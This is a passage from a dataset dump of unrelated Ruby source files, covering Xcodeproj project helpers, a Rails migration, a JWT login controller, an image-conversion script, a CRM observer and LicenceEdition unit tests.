    object.isa == 'PBXFileReference' && object.real_path == wanted
  end
end
# @return [ObjectList<AbstractTarget>] A list of all the targets in the
# project.
#
def targets
root_object.targets
end
# @return [ObjectList<PBXNativeTarget>] A list of all the targets in the
# project excluding aggregate targets.
#
def native_targets
root_object.targets.grep(PBXNativeTarget)
end
# @return [PBXGroup] The group which holds the product file references.
#
def products_group
root_object.product_ref_group
end
# @return [ObjectList<PBXFileReference>] A list of the product file
# references.
#
def products
products_group.children
end
# @return [PBXGroup] the `Frameworks` child of the main group, creating
#         it on first access if it does not exist yet.
#
def frameworks_group
  main_group['Frameworks'] || main_group.new_group('Frameworks')
end
# @return [XCConfigurationList] The project-level build configuration
#         list stored on the root object (a single list, not an
#         ObjectList).
#
def build_configuration_list
  root_object.build_configuration_list
end
# @return [ObjectList<XCBuildConfiguration>] A list of project wide
# build configurations.
#
def build_configurations
root_object.build_configuration_list.build_configurations
end
# Returns the build settings of the project wide build configuration with
# the given name.
#
# @param [String] name
# The name of a project wide build configuration.
#
# @return [Hash] The build settings.
#
def build_settings(name)
root_object.build_configuration_list.build_settings(name)
end
public
# @!group Helpers
#-------------------------------------------------------------------------#
# Creates a new file reference in the main group.
#
# @param (see PBXGroup#new_file)
#
# @return [PBXFileReference] the new file.
#
def new_file(path, source_tree = :group)
  main_group.new_file(path, source_tree)
end
# Creates a new group at the given subpath of the main group.
#
# @param (see PBXGroup#new_group)
#
# @return [PBXGroup] the new group.
#
def new_group(name, path = nil, source_tree = :group)
  main_group.new_group(name, path, source_tree)
end
# Creates a new target and adds it to the project.
#
# The target is configured for the given platform and its file reference
# is added to the {products_group}.
#
# The target is pre-populated with common build settings, and the
# appropriate Framework according to the platform is added to its
# Frameworks phase.
#
# @param [Symbol] type
#        the type of target. Can be `:application`, `:framework`,
#        `:dynamic_library` or `:static_library`.
#
# @param [String] name
#        the name of the target product.
#
# @param [Symbol] platform
#        the platform of the target. Can be `:ios` or `:osx`.
#
# @param [String] deployment_target
#        the deployment target for the platform.
#
# @param [PBXGroup] product_group
#        the group where to add the target's product file reference;
#        defaults to {products_group} when nil.
#
# @param [Symbol] language
#        the primary language of the target, can be `:objc` or `:swift`.
#
# @return [PBXNativeTarget] the target.
#
def new_target(type, name, platform, deployment_target = nil, product_group = nil, language = nil)
  product_group ||= products_group
  ProjectHelper.new_target(self, type, name, platform, deployment_target, product_group, language)
end
# Creates a new resource bundle target and adds it to the project.
#
# The target is configured for the given platform and its file reference
# is added to the {products_group}.
#
# The target is pre-populated with common build settings.
#
# @param [String] name
#        the name of the resources bundle.
#
# @param [Symbol] platform
#        the platform of the resources bundle. Can be `:ios` or `:osx`.
#
# @param [PBXGroup] product_group
#        the group where to add the bundle's product file reference;
#        defaults to {products_group} when nil.
#
# @return [PBXNativeTarget] the target.
#
def new_resources_bundle(name, platform, product_group = nil)
  product_group ||= products_group
  ProjectHelper.new_resources_bundle(self, name, platform, product_group)
end
# Creates a new aggregate target and adds it to the project.
#
# @param [String] name
#        the name of the target.
#
# @param [Array<AbstractTarget>] target_dependencies
#        targets, which should be added as dependencies.
#
# @return [PBXAggregateTarget] the target.
#
def new_aggregate_target(name, target_dependencies = [])
  aggregate_target = ProjectHelper.new_aggregate_target(self, name)
  target_dependencies.each do |dependency|
    aggregate_target.add_dependency(dependency)
  end
  aggregate_target
end
# Adds a new build configuration to the project and populates its with
# default settings according to the provided type.
#
# @param [String] name
# The name of the build configuration.
#
# @param [Symbol] type
# The type of the build configuration used to populate the build
# settings, must be :debug or :release.
#
# @return [XCBuildConfiguration] The new build configuration.
#
def add_build_configuration(name, type)
  configuration_list = root_object.build_configuration_list
  existing = configuration_list[name]
  return existing if existing

  configuration = new(XCBuildConfiguration)
  configuration.name = name
  # Project-wide defaults: the shared settings merged with the
  # type-specific (:debug / :release) ones.
  defaults = Constants::PROJECT_DEFAULT_BUILD_SETTINGS
  settings = ProjectHelper.deep_dup(defaults[:all])
  settings.merge!(ProjectHelper.deep_dup(defaults[type]))
  configuration.build_settings = settings
  configuration_list.build_configurations << configuration
  configuration
end
# Sorts the project.
#
# @param [Hash] options
# the sorting options.
# @option options [Symbol] :groups_position
# the position of the groups can be either `:above` or `:below`.
#
# @return [void]
#
def sort(options = nil)
root_object.sort_recursively(options)
end
public
# @!group Schemes
#-------------------------------------------------------------------------#
# Get list of shared schemes in project
#
# @param [String] project_path
#        project path
#
# @return [Array] the shared scheme names; falls back to the project's
#         own name when no shared scheme exists.
#
def self.schemes(project_path)
  pattern = File.join(project_path, 'xcshareddata', 'xcschemes', '*.xcscheme')
  names = Dir[pattern].map { |scheme_path| File.basename(scheme_path, '.xcscheme') }
  names << File.basename(project_path, '.xcodeproj') if names.empty?
  names
end
# Recreates the user schemes of the project from scratch (removes the
# folder) and optionally hides them.
#
# @param [Bool] visible
#        Whether the schemes should be visible or hidden.
#
# @return [void]
#
def recreate_user_schemes(visible = true)
  schemes_dir = XCScheme.user_data_dir(path)
  # Wipe the whole per-user schemes folder so stale schemes do not linger.
  FileUtils.rm_rf(schemes_dir)
  FileUtils.mkdir_p(schemes_dir)

  xcschememanagement = {}
  xcschememanagement['SchemeUserState'] = {}
  xcschememanagement['SuppressBuildableAutocreation'] = {}

  # One fresh scheme per target, recorded in the management plist with
  # the requested visibility.
  targets.each do |target|
    scheme = XCScheme.new
    scheme.add_build_target(target)
    # NOTE(review): third argument presumably marks the scheme as shared
    # (false = user scheme) — confirm against XCScheme#save_as.
    scheme.save_as(path, target.name, false)
    xcschememanagement['SchemeUserState']["#{target.name}.xcscheme"] = {}
    xcschememanagement['SchemeUserState']["#{target.name}.xcscheme"]['isShown'] = visible
  end

  xcschememanagement_path = schemes_dir + 'xcschememanagement.plist'
  Xcodeproj.write_plist(xcschememanagement, xcschememanagement_path)
end
#-------------------------------------------------------------------------#
end
end
| 33.943681 | 105 | 0.641779 |
# Creates the `fokemons` table. (Dataset residue fused into the class
# line has been removed.)
class CreateFokemons < ActiveRecord::Migration[6.0]
  def change
    create_table :fokemons do |t|
      t.string :name
      # WARNING(review): `type` is Active Record's reserved single-table
      # inheritance column. Keeping this name requires the Fokemon model
      # to override `inheritance_column`; consider renaming (e.g.
      # :element) if the schema is still changeable.
      t.string :type, default: "water"
      t.integer :hit_points, default: 0
      t.integer :attack_points, default: 0
      t.string :avatar, default: 'https://i.ytimg.com/vi/OxgKvRvNd5o/maxresdefault.jpg'

      t.timestamps
    end
  end
end
| 27.142857 | 90 | 0.647368 |
class AuthenticationController < ApplicationController
  before_action :authenticate_request!, only: [:ping]

  # POST /api/login
  # Authenticates a user by email and password. On success responds with
  # an auth token and basic user data as JSON; on a wrong password it
  # responds 401.
  #
  # NOTE(review): passwords appear to be stored and compared in plain
  # text here — consider `has_secure_password` (bcrypt). `secure_compare`
  # below at least makes the comparison constant-time.
  def authenticate_user
    user = User.find_by(email: params[:email])
    # A missing user raises NoMethodError on `user.password`, which the
    # rescue below maps to a 404 — matching the original control flow.
    if ActiveSupport::SecurityUtils.secure_compare(user.password.to_s, params[:password].to_s)
      render json: payload(user)
    else
      render json: { errors: ['Invalid Password'] }, status: :unauthorized
    end
  rescue NoMethodError
    render_not_found "Email not registered"
  end

  # GET /api/ping
  # Liveness check for the authenticated API; echoes the current user id.
  def ping
    render json: { logged_in: true, user: current_user.id }
  end

  private

  # Builds the login response: an auth token plus a Hash of basic user data.
  #
  # @return [Hash, nil] {auth_token:, user: {id:, email:, type:, name:}},
  #         or nil when the user is missing or unsaved.
  def payload(user)
    return nil unless user&.id

    {
      auth_token: JsonWebToken.encode({ user_id: user.id }),
      user: { id: user.id, email: user.email, type: user.type, name: user.name }
    }
  end
end
| 29.075 | 78 | 0.693035 |
require 'mini_magick'
require 'securerandom'
# Converts every image matched by +dir+ (a Dir.glob pattern) to a PNG
# capped at a 500x500-pixel total area, then deletes the original file.
#
# @param dir [String] a glob pattern, e.g. "photos/*.jpg"
# @return [Array<String>] the matched (now deleted) source paths
def convert_all_jpgs(dir)
  files = Dir.glob(dir)
  files.each do |file|
    filename = File.basename(file, '.*')
    directory = File.dirname(file)
    puts "Converting #{file}..."
    image = MiniMagick::Image.open(file)
    image.resize "#{500 * 500}@>" # "@" geometry = limit by pixel area, ">" = only shrink
    image.format "png"
    # Fixed: the output path was a corrupted literal ("#(unknown)"), so
    # every conversion overwrote the same file while the sources were
    # deleted — losing data.
    out_filename = "#{directory}/#{filename}.png"
    puts "Writing #{out_filename}"
    image.write out_filename
    File.delete(file)
  end
  files
end
# Writes a rotated copy of the image at +path+ to a uniquely named file
# under /tmp and returns that temp file's path.
def create_rotated_image(path, degrees)
  rotated_copy_path = File.join('/tmp', SecureRandom.uuid)
  image = MiniMagick::Image.open(path)
  image.rotate degrees
  puts "creating temp file #{rotated_copy_path} with rotation #{degrees}"
  image.write(rotated_copy_path)
  rotated_copy_path
end
# Rotates the image file at +path+ by +degrees+, overwriting the original.
# NOTE(review): relies on MiniMagick::Image.new applying operations to
# the file in place (mogrify) — confirm with the mini_magick version in use.
def rotate_in_place(path, degrees)
  image = MiniMagick::Image.new(path)
  image.rotate degrees
end
# frozen_string_literal: true
# Copyright (c) 2008-2013 Michael Dvorkin and contributors.
#
# Fat Free CRM is freely distributable under the terms of MIT license.
# See MIT-LICENSE file or http://www.opensource.org/licenses/mit-license.php
#------------------------------------------------------------------------------
class EntityObserver < ActiveRecord::Observer
  observe :account, :contact, :lead, :opportunity

  # Mail the assignee when a record is created on their behalf by someone else.
  def after_create(item)
    send_notification_to_assignee(item) if current_user != item.assignee
  end

  # Mail the new assignee when a record is re-assigned away from the acting user.
  def after_update(item)
    send_notification_to_assignee(item) if item.saved_change_to_assigned_to? && item.assignee != current_user
  end

  private

  # Delivers the assignment notification, provided there is an assignee,
  # a known acting user, and a configured host.
  def send_notification_to_assignee(item)
    return unless item.assignee.present? && current_user.present? && can_send_email?

    UserMailer.assigned_entity_notification(item, current_user).deliver_now
  end

  # Need to have a host set before email can be sent
  def can_send_email?
    Setting.host.present?
  end

  # Resolves PaperTrail's whodunnit, which is inconsistently either a
  # User instance or a String holding the user's id.
  def current_user
    whodunnit = PaperTrail.request.whodunnit
    case whodunnit
    when User then whodunnit
    when String then User.find_by_id(whodunnit.to_i)
    end
  end

  ActiveSupport.run_load_hooks(:fat_free_crm_entity_observer, self)
end
| 31.130435 | 126 | 0.717179 |
require_relative '../test_helper'
# Unit tests for LicenceEdition: extra licence fields, identifier
# validations, continuation-link URL validation, cloning and search
# indexing behaviour.
class LicenceEditionTest < ActiveSupport::TestCase
  def setup
    @artefact = FactoryGirl.create(:artefact)
  end

  should "have correct extra fields" do
    l = FactoryGirl.create(
      :licence_edition,
      panopticon_id: @artefact.id,
      licence_identifier: "AB1234",
      licence_short_description: "Short description of licence",
      licence_overview: "Markdown overview of licence...",
      will_continue_on: "The HMRC website",
      continuation_link: "http://www.hmrc.gov.uk"
    )
    assert_equal "AB1234", l.licence_identifier
    assert_equal "Short description of licence", l.licence_short_description
    assert_equal "Markdown overview of licence...", l.licence_overview
    assert_equal "The HMRC website", l.will_continue_on
    assert_equal "http://www.hmrc.gov.uk", l.continuation_link
  end

  context "validations" do
    setup do
      @l = FactoryGirl.build(:licence_edition, panopticon_id: @artefact.id)
    end

    should "require a licence identifier" do
      @l.licence_identifier = ''
      assert_equal false, @l.valid?, "expected licence edition not to be valid"
    end

    context "licence identifier uniqueness" do
      should "require a unique licence identifier" do
        artefact2 = FactoryGirl.create(:artefact)
        FactoryGirl.create(:licence_edition, :licence_identifier => "wibble", panopticon_id: artefact2.id)
        @l.licence_identifier = "wibble"
        assert ! @l.valid?, "expected licence edition not to be valid"
      end

      should "not consider archived editions when evaluating uniqueness" do
        artefact2 = FactoryGirl.create(:artefact)
        FactoryGirl.create(:licence_edition, :licence_identifier => "wibble", panopticon_id: artefact2.id, :state => "archived")
        @l.licence_identifier = "wibble"
        assert @l.valid?, "expected licence edition to be valid"
      end
    end

    should "not require a unique licence identifier for different versions of the same licence edition" do
      @l.state = 'published'
      @l.licence_identifier = 'wibble'
      @l.save!

      new_version = @l.build_clone
      assert_equal 'wibble', new_version.licence_identifier
      assert new_version.valid?, "Expected clone to be valid"
    end

    should "not validate the continuation link when blank" do
      @l.continuation_link = ""
      assert @l.valid?, "continuation link validation should not be triggered when the field is blank"
    end

    should "fail validation when the continuation link has an invalid url" do
      @l.continuation_link = "not&a+valid_url"
      # Fixed: the source was garbled by email obfuscation into
      # "[email protected]?"; the intended assertion is the negated validity check.
      assert !@l.valid?, "continuation link validation should fail with a invalid url"
    end

    should "pass validation with a valid continuation link url" do
      @l.continuation_link = "http://www.hmrc.gov.uk"
      assert @l.valid?, "continuation_link validation should pass with a valid url"
    end
  end

  should "clone extra fields when cloning edition" do
    licence = FactoryGirl.create(:licence_edition,
                                 :panopticon_id => @artefact.id,
                                 :state => "published",
                                 :licence_identifier => "1234",
                                 :licence_short_description => "Short description of licence",
                                 :licence_overview => "Overview to be cloned",
                                 :will_continue_on => "Continuation text to be cloned",
                                 :continuation_link => "http://www.gov.uk")
    new_licence = licence.build_clone

    assert_equal licence.licence_identifier, new_licence.licence_identifier
    assert_equal licence.licence_short_description, new_licence.licence_short_description
    assert_equal licence.licence_overview, new_licence.licence_overview
    assert_equal licence.will_continue_on, new_licence.will_continue_on
    assert_equal licence.continuation_link, new_licence.continuation_link
  end

  context "indexable_content" do
    should "include the licence_overview, removing markup" do
      licence = FactoryGirl.create(:licence_edition)
      assert_includes licence.indexable_content, "This is a licence overview"
    end

    should "include the licence_short_description" do
      licence = FactoryGirl.create(:licence_edition)
      assert_includes licence.indexable_content, "This is a licence short description."
    end
  end
end
| 41.716981 | 128 | 0.688602 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.